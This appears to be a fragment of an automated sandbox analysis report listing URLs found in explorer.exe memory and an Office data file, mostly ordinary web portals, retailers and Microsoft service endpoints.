    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.linternaute.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.maktoob.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
    Source: explorer.exe, 00000008.00000000.1207813455.0000000007D12000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp
    Source: explorer.exe, 00000008.00000000.1207813455.0000000007D12000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp/
    Source: explorer.exe, 00000008.00000000.1207813455.0000000007D12000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.myspace.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.nate.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.news.com.au/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.nifty.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.orange.fr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.otto.de/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozu.es/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.pchome.com.tw/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.recherche.aol.fr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.servicios.clarin.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.shopzilla.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.sify.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.t-online.de/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.onedrive.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://augloop.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://cdn.entity.
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/documentvirality/prod/index.html
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/progressui/index.html
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://cr.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://directory.services.
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://graph.windows.net
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://graph.windows.net/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://login.microsoftonline.com/common
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://login.windows.local
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://management.azure.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://management.azure.com/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://messaging.office.com/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://officeapps.live.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://onedrive.live.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://retailer.osi.office.net/appstate/query
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://settings.outlook.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://tasks.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://templatelogging.office.com/client/log
